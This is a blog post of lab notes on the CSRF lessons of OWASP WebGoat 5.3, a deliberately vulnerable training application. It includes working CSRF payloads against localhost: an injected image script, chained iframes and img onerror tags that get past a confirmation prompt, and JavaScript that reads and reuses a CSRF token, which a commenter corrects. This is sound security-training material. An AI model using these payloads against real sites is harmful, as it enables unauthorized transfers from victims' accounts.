Home » Blogs » Marie's blog

WebGoat Part 2

This is part 2 of my notes on OWASP WebGoat V5.3.

     

  • Cross Site Request Forgery (CSRF)

    • Though this isn't what the lesson asks for, it also triggers the checkoff:

      • <script>var XSSImage=new Image(); XSSImage.src='http://localhost/webgoat/attack?Screen=13&menu=900&transferFunds=4000';</script>

    • There are inconsistencies in the value to be transferred (4000, 5000, 400)

  • CSRF Prompt By-Pass

    • The page number in the solution for iframes is wrong.  This worked:

      • <iframe
            src="http://localhost/webgoat/attack?Screen=5&menu=900&transferFunds=400"
            id="myFrame" frameborder="1" marginwidth="0"
            marginheight="0" width="800" scrolling=yes height="300"
            onload="document.getElementById('frame2').src='http://localhost/webgoat/attack?Screen=6&menu=900&transferFunds=CONFIRM';">

        </iframe>
           
        <iframe
            id="frame2" frameborder="1" marginwidth="0"
            marginheight="0" width="800" scrolling=yes height="300">
        </iframe>

    • The solution for the img tag needed changes to the screen number, menu number, and was missing /webgoat/.  This works:

      • <img src="http://localhost/webgoat/attack?Screen=6&menu=900&transferFunds=5000" onerror="document.getElementById('image2').src='http://localhost/webgoat/attack?Screen=6&menu=900&transferFunds=CONFIRM'" width="1" height="1" /><img id="image2" width="1" height="1" />

    • To try later: XmlHttpRequest over post

  • CSRF Token By-Pass - Having trouble setting token:

    • <script language="javascript">

      <!--

      var tokenvalue;

      function readFrame1()
      {
      var frameDoc = document.getElementById("frame1").contentDocument;
      var form = frameDoc.getElementsByTagName("Form")[0];

      alert('Stops working here');

      var token = form.CSRFToken.value;
      alert(token);
      tokenvalue = '&CSRFToken='+token;
      loadFrame2();
      }

      function loadFrame2()
      {
      var testFrame = document.getElementById("frame2");
      testFrame.src="http://localhost/webgoat/attack?Screen=2&menu=900&transferFunds=4000"+tokenvalue;
      }

      //-->

      </script>

      <iframe src="http://localhost/webgoat/attack?Screen=2&menu=900&transferFunds=main" onload="readFrame1();" id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300">

      </iframe>
      <iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>

 

For your CSRF Token-By-Pass

Submitted by Anonymous on Wed, 04/21/2010 - 22:35.

For your CSRF Token-By-Pass answer, the problem lies within "var form = frameDoc.getElementsByTagName("Form")[0];"

If you notice, there is a language selection box at the top of the page, which is form index 0.  If you change that to "var form = frameDoc.getElementsByTagName("Form")[1];" , you should find that it works.